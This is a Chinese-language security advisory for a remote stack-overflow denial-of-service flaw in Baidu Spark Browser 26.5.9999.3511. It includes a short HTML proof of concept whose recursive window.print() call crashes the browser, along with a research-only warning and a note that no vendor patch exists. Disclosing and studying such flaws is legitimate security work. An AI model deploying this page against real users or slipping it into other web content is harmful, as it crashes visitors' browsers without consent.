发布日期：2014-03-10
更新日期：2014-07-02

受影响系统：

Baidu Spark Browser 26.5.9999.3511

描述：

---

BUGTRAQ  ID: 68288

Baidu Spark浏览器是基于Chromium的Web浏览器。

Baidu Spark Browser 26.5.9999.3511及其他版本在实现上存在远程拒绝服务漏洞，成功利用后可允许攻击者使受影响浏览器崩溃，导致拒绝服务。

<*来源：Gjoko 'LiquidWorm' Krstic
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>
<body bgcolor="#50708C">
<center>
<p><font color="#e3e3e3">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>
<button onClick=crash()>Execute!</button>
</center>
<script>
function crash(){
  window.print();
  crash();
}
</script>
</body>
</html>

建议：

---

厂商补丁：

Baidu
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://en.browser.baidu.com/

浏览次数：2279
严重程度：0（网友投票）